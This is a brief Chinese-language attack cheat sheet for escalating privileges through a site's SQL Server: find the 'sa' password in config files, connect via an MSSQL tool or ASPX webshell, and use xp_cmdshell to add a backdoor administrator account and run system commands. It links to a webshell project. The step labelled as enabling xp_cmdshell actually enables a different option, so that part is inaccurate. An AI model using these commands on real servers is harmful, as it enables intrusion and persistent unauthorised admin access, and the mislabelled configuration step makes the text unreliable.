如果网站使用了sqlserver数据库,如果能找到sa的密码,利用提权脚本执行命令,但是不一定是系统权限,还要看管理员在安装时设置的权限
敏感文件
web.config
config.asp
conn.aspx
database.aspx
使用mssql连接工具或者webshell net提权脚本输入账号和密码连接
开启xp_cmdshell
Exec sp_configure ‘show advanced options’,1;RECONFIGURE;exec sp_configure ‘Ad Hoc
Distributed Queries’,1;RECONFIGURE;
增加一个用户
Exec master.dbo.xp_cmdshell ‘net user lx 123456 /add & net localgroup
administrators lx /add’
Exec master.dbo.xp_cmdshell ‘systeminfo’
脚本
https://github.com/anasroubi/aspx-webmanagershell